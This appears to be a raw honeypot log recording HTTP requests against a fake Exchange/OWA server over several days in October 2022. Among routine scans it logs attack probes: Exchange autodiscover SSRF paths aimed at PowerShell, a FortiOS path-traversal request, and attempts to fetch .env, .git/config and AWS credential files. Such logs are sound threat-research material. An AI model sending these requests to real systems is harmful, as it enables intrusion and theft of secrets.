2022-10-02 23:21:48,020 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/? 77.124.170.203
2022-10-02 23:21:48,574 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:21:49,093 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 77.124.170.203
2022-10-02 23:22:00,163 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/? 77.124.170.203
2022-10-02 23:22:00,681 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:22:01,048 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 77.124.170.203
2022-10-02 23:22:44,850 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/? 77.124.170.203
2022-10-02 23:22:45,530 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:22:46,039 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 77.124.170.203
2022-10-02 23:23:17,643 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/? 77.124.170.203
2022-10-02 23:23:18,185 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:23:18,721 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 77.124.170.203
2022-10-02 23:24:22,282 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/? 77.124.170.203
2022-10-02 23:24:22,896 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:24:23,407 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 77.124.170.203
2022-10-02 23:25:35,649 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 77.124.170.203
2022-10-02 23:25:36,234 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:25:36,764 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 77.124.170.203
2022-10-02 23:26:40,820 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/asdasd? 77.124.170.203
2022-10-02 23:26:45,334 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 77.124.170.203
2022-10-02 23:26:46,053 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:27:21,148 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 77.124.170.203
2022-10-02 23:27:21,685 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:27:22,269 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 77.124.170.203
2022-10-02 23:27:24,721 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 77.124.170.203
2022-10-02 23:27:25,224 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:27:25,590 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 77.124.170.203
2022-10-02 23:30:38,632 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 77.124.170.203
2022-10-02 23:30:39,207 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:30:39,728 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 77.124.170.203
2022-10-02 23:31:27,035 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 77.124.170.203
2022-10-02 23:31:27,582 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:31:28,107 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 77.124.170.203
2022-10-02 23:32:22,172 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 77.124.170.203
2022-10-02 23:32:22,679 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:32:23,048 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 77.124.170.203
2022-10-02 23:34:10,004 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover? 213.57.25.70
2022-10-02 23:34:10,866 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover/? 213.57.25.70
2022-10-02 23:34:11,096 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover? 77.124.170.203
2022-10-02 23:34:11,756 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/ecp/? 213.57.25.70
2022-10-02 23:34:11,775 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover/? 77.124.170.203
2022-10-02 23:34:12,145 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/ecp/? 77.124.170.203
2022-10-02 23:35:04,571 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover? 77.124.170.203
2022-10-02 23:35:04,937 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover/? 77.124.170.203
2022-10-02 23:35:05,299 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/ecp/? 77.124.170.203
2022-10-02 23:35:05,950 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:35:42,780 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover/autodiscover.json?a@foo.var/owa/&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell 77.124.170.203
2022-10-02 23:35:43,153 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/ecp/? 77.124.170.203
2022-10-02 23:35:43,692 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:35:58,778 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 77.124.170.203
2022-10-02 23:35:59,279 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-03 00:22:38,851 – honeypot – DEBUG – LOGGING REQUEST: SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/? 157.245.176.143
2022-10-03 02:34:47,741 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 192.241.214.70
2022-10-03 02:40:59,312 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover/autodiscover.json?@zdi/Powershell 192.241.219.226
2022-10-03 03:40:47,505 – honeypot – DEBUG – LOGGING REQUEST: GET /? 183.136.225.35
2022-10-03 03:40:50,826 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 183.136.225.35
2022-10-03 03:51:56,146 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 183.136.225.35
2022-10-03 03:51:57,021 – honeypot – DEBUG – LOGGING REQUEST: GET /robots.txt? 183.136.225.35
2022-10-03 05:05:16,652 – honeypot – DEBUG – LOGGING REQUEST: POST /owa/auth.owa? 146.70.117.10
2022-10-03 05:05:16,749 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/UnifiedMessagin/inside/loggedin/logged/ok? 146.70.117.10
2022-10-03 05:05:16,843 – honeypot – DEBUG – LOGGING REQUEST: POST /ecp/pentest.js? 146.70.117.10
2022-10-03 05:40:56,572 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2g? 165.227.41.100
2022-10-03 05:40:57,126 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2h? 165.227.41.100
2022-10-03 05:41:05,291 – honeypot – DEBUG – LOGGING REQUEST: GET /? 165.227.41.100
2022-10-03 05:54:54,125 – honeypot – DEBUG – LOGGING REQUEST: POST /owa/auth.owa? 37.120.198.152
2022-10-03 05:54:54,318 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/UnifiedMessagin/inside/loggedin/logged/ok? 37.120.198.152
2022-10-03 05:54:54,496 – honeypot – DEBUG – LOGGING REQUEST: POST /ecp/pentest.js? 37.120.198.152
2022-10-03 06:21:02,467 – honeypot – DEBUG – LOGGING REQUEST: GET /? 184.105.247.194
2022-10-03 06:26:03,835 – honeypot – DEBUG – LOGGING REQUEST: HEAD /owa/? 184.105.247.214
2022-10-03 06:27:18,323 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 184.105.247.194
2022-10-03 06:36:20,957 – honeypot – DEBUG – LOGGING REQUEST: GET /? 192.241.220.43
2022-10-03 06:37:08,447 – honeypot – DEBUG – LOGGING REQUEST: GET /? 184.105.247.194
2022-10-03 06:37:09,888 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 184.105.247.194
2022-10-03 06:42:53,731 – honeypot – DEBUG – LOGGING REQUEST: GET /? 172.105.189.111
2022-10-03 06:42:54,770 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 172.105.189.111
2022-10-03 07:05:49,713 – honeypot – DEBUG – LOGGING REQUEST: GET /? 104.210.55.152
2022-10-03 07:20:29,372 – honeypot – DEBUG – LOGGING REQUEST: GET /? 13.52.179.45
2022-10-03 07:56:15,447 – honeypot – DEBUG – LOGGING REQUEST: GET /? 34.78.6.216
2022-10-03 08:23:15,175 – honeypot – DEBUG – LOGGING REQUEST: GET /public/aws/credentials? 18.118.158.112
2022-10-03 09:05:32,542 – honeypot – DEBUG – LOGGING REQUEST: GET /version? 192.241.212.170
2022-10-03 09:47:05,946 – honeypot – DEBUG – LOGGING REQUEST: GET /? 167.94.146.58
2022-10-03 09:47:05,955 – honeypot – DEBUG – LOGGING REQUEST: GET /? 167.94.146.58
2022-10-03 09:47:05,970 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx? 167.94.146.58
2022-10-03 09:47:05,992 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 167.94.146.58
2022-10-03 09:47:06,004 – honeypot – DEBUG – LOGGING REQUEST: GET /favicon.ico? 167.94.146.58
2022-10-03 10:07:11,883 – honeypot – DEBUG – LOGGING REQUEST: GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession 152.89.196.23
2022-10-03 11:13:55,527 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com 195.161.41.37
2022-10-03 11:13:55,719 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/ecp/? 195.161.41.37
2022-10-03 11:14:19,152 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com 195.161.41.37
2022-10-03 11:14:19,418 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/ecp/? 195.161.41.37
2022-10-03 11:16:51,662 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com 195.161.41.37
2022-10-03 11:16:51,792 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/ecp/? 195.161.41.37
2022-10-03 11:51:39,643 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp 89.23.145.158
2022-10-03 11:51:39,853 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/ecp/? 89.23.145.158
2022-10-03 17:11:08,665 – honeypot – DEBUG – LOGGING REQUEST: GET /? 43.158.214.10
2022-10-03 19:58:40,468 – honeypot – DEBUG – LOGGING REQUEST: GET /? 71.6.232.2
2022-10-03 19:59:18,733 – honeypot – DEBUG – LOGGING REQUEST: GET /? 20.203.43.236
2022-10-03 20:10:00,283 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 77.124.170.203
2022-10-03 20:10:01,013 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-03 20:10:05,920 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp 77.124.170.203
2022-10-03 20:10:06,315 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/ecp/? 77.124.170.203
2022-10-03 20:10:06,877 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-03 22:57:45,737 – honeypot – DEBUG – LOGGING REQUEST: GET /? 178.62.229.117
2022-10-03 22:57:45,877 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 178.62.229.117
2022-10-04 00:15:30,503 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/x.js? 192.241.216.180
2022-10-04 01:15:11,410 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx? 192.241.217.209
2022-10-04 01:20:30,174 – honeypot – DEBUG – LOGGING REQUEST: GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application? 192.241.219.128
2022-10-04 01:32:30,971 – honeypot – DEBUG – LOGGING REQUEST: GET /? 205.210.31.5
2022-10-04 01:32:31,546 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 205.210.31.5
2022-10-04 02:08:32,810 – honeypot – DEBUG – LOGGING REQUEST: GET /_asterisk/magnito.php? 193.46.255.199
2022-10-04 02:23:20,920 – honeypot – DEBUG – LOGGING REQUEST: GET /.git/config? 54.85.5.231
2022-10-04 02:37:33,141 – honeypot – DEBUG – LOGGING REQUEST: GET /? 184.105.247.194
2022-10-04 02:41:36,506 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 184.105.247.202
2022-10-04 02:43:47,973 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 192.241.218.217
2022-10-04 02:46:50,736 – honeypot – DEBUG – LOGGING REQUEST: GET /favicon.ico? 184.105.247.194
2022-10-04 02:50:35,478 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/x.js? 184.105.247.210
2022-10-04 05:30:53,267 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2g? 139.59.160.72
2022-10-04 05:30:53,373 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2h? 139.59.160.72
2022-10-04 06:34:13,532 – honeypot – DEBUG – LOGGING REQUEST: GET /? 192.241.218.181
2022-10-04 06:52:40,065 – honeypot – DEBUG – LOGGING REQUEST: GET /? 20.113.26.150
2022-10-04 07:53:59,544 – honeypot – DEBUG – LOGGING REQUEST: GET /? 34.77.127.183
2022-10-04 08:49:42,602 – honeypot – DEBUG – LOGGING REQUEST: GET /? 167.248.133.46
2022-10-04 08:49:42,910 – honeypot – DEBUG – LOGGING REQUEST: GET /? 167.248.133.46
2022-10-04 08:49:43,523 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx? 167.248.133.46
2022-10-04 08:49:44,337 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 167.248.133.46
2022-10-04 08:49:44,646 – honeypot – DEBUG – LOGGING REQUEST: GET /favicon.ico? 167.248.133.46
2022-10-04 09:35:16,586 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2g? 139.59.80.175
2022-10-04 09:35:17,186 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2h? 139.59.80.175
2022-10-04 13:11:07,802 – honeypot – DEBUG – LOGGING REQUEST: GET /? 205.210.31.22
2022-10-04 13:11:08,249 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 205.210.31.22
2022-10-04 15:09:37,387 – honeypot – DEBUG – LOGGING REQUEST: GET /? 167.248.133.47
2022-10-04 15:09:48,065 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx? 167.248.133.47
2022-10-04 15:09:48,881 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 167.248.133.47
2022-10-04 15:09:49,188 – honeypot – DEBUG – LOGGING REQUEST: GET /favicon.ico? 167.248.133.47
2022-10-04 15:31:21,283 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2g? 164.90.149.248
2022-10-04 15:31:21,988 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2h? 164.90.149.248
2022-10-04 15:31:30,013 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover/autodiscover.json?@1337.com/owa/?&Email=autodiscover/autodiscover.json%3F@1337.com 89.248.165.203
2022-10-04 15:31:31,174 – honeypot – DEBUG – LOGGING REQUEST: GET /? 164.90.149.248
2022-10-04 15:31:31,856 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 164.90.149.248
2022-10-04 16:48:39,462 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp 89.23.145.158
2022-10-04 16:48:39,668 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/ecp/? 89.23.145.158
2022-10-04 19:37:05,546 – honeypot – DEBUG – LOGGING REQUEST: GET /actuator/health? 192.241.212.204
2022-10-04 20:39:55,146 – honeypot – DEBUG – LOGGING REQUEST: GET /? 198.235.24.149
2022-10-04 20:39:55,194 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 198.235.24.149
2022-10-04 23:43:05,124 – honeypot – DEBUG – LOGGING REQUEST: GET /? 167.94.138.119
2022-10-04 23:43:05,438 – honeypot – DEBUG – LOGGING REQUEST: GET /? 167.94.138.119
2022-10-04 23:43:06,092 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx? 167.94.138.119
2022-10-04 23:43:06,963 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 167.94.138.119
2022-10-04 23:43:07,269 – honeypot – DEBUG – LOGGING REQUEST: GET /favicon.ico? 167.94.138.119
2022-10-05 00:38:37,836 – honeypot – DEBUG – LOGGING REQUEST: GET /? 159.65.156.36
2022-10-05 00:38:38,370 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 159.65.156.36
2022-10-05 01:20:43,743 – honeypot – DEBUG – LOGGING REQUEST: GET /? 209.222.252.91
2022-10-05 01:20:44,154 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 209.222.252.91
2022-10-05 02:39:09,393 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 192.241.207.137
2022-10-05 03:10:26,144 – honeypot – DEBUG – LOGGING REQUEST: GET /? 193.118.53.194
2022-10-05 03:10:26,247 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 193.118.53.194
2022-10-05 03:17:03,213 – honeypot – DEBUG – LOGGING REQUEST: GET /? 209.97.137.184
2022-10-05 03:17:03,423 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 209.97.137.184
2022-10-05 04:10:24,546 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 192.241.208.244
2022-10-05 04:15:37,837 – honeypot – DEBUG – LOGGING REQUEST: GET /ReportServer? 192.241.210.170
2022-10-05 04:18:53,657 – honeypot – DEBUG – LOGGING REQUEST: GET /login? 192.241.219.219
2022-10-05 04:36:54,100 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/x.js? 192.241.216.172
2022-10-05 05:14:54,805 – honeypot – DEBUG – LOGGING REQUEST: SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/? 138.68.249.116
2022-10-05 05:24:58,016 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx? 192.241.213.175
2022-10-05 05:27:51,332 – honeypot – DEBUG – LOGGING REQUEST: GET /? 128.1.248.26
2022-10-05 05:30:42,998 – honeypot – DEBUG – LOGGING REQUEST: GET /favicon.ico? 109.248.6.82
2022-10-05 05:33:03,557 – honeypot – DEBUG – LOGGING REQUEST: GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application? 192.241.216.180
2022-10-05 05:46:17,652 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 192.241.214.71
2022-10-05 06:04:18,502 – honeypot – DEBUG – LOGGING REQUEST: GET /? 87.236.176.90
2022-10-05 06:35:50,010 – honeypot – DEBUG – LOGGING REQUEST: GET /? 192.241.219.220
2022-10-05 06:52:39,258 – honeypot – DEBUG – LOGGING REQUEST: GET /.env? 109.237.97.204
2022-10-05 08:00:51,277 – honeypot – DEBUG – LOGGING REQUEST: GET /? 130.211.54.158
2022-10-05 08:08:23,626 – honeypot – DEBUG – LOGGING REQUEST: GET /? 185.163.109.66
2022-10-05 08:08:23,752 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 185.163.109.66
2022-10-05 08:08:29,239 – honeypot – DEBUG – LOGGING REQUEST: GET /robots.txt? 185.163.109.66
2022-10-05 08:08:29,356 – honeypot – DEBUG – LOGGING REQUEST: GET /sitemap.xml? 185.163.109.66
2022-10-05 08:08:29,499 – honeypot – DEBUG – LOGGING REQUEST: GET /.well-known/security.txt? 185.163.109.66
2022-10-05 08:08:29,846 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 185.163.109.66
2022-10-05 08:08:30,025 – honeypot – DEBUG – LOGGING REQUEST: GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application? 185.163.109.66
2022-10-05 08:08:30,128 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/x.js? 185.163.109.66
2022-10-05 08:39:03,111 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2g? 167.71.166.104
2022-10-05 08:39:10,088 – honeypot – DEBUG – LOGGING REQUEST: GET /? 167.71.166.104
2022-10-05 08:40:42,319 – honeypot – DEBUG – LOGGING REQUEST: GET /? 64.62.197.17
2022-10-05 08:43:19,524 – honeypot – DEBUG – LOGGING REQUEST: HEAD /owa/? 64.62.197.28
2022-10-05 08:44:08,414 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 64.62.197.30
2022-10-05 10:08:46,671 – honeypot – DEBUG – LOGGING REQUEST: GET /? 193.118.53.194
2022-10-05 10:08:46,699 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 193.118.53.194
2022-10-05 10:56:56,774 – honeypot – DEBUG – LOGGING REQUEST: GET /? 20.113.27.135
2022-10-05 11:00:24,320 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp 89.23.145.158
2022-10-05 11:00:24,521 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/ecp/? 89.23.145.158
2022-10-05 11:05:32,016 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2g? 143.198.151.165
2022-10-05 11:05:32,779 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2h? 143.198.151.165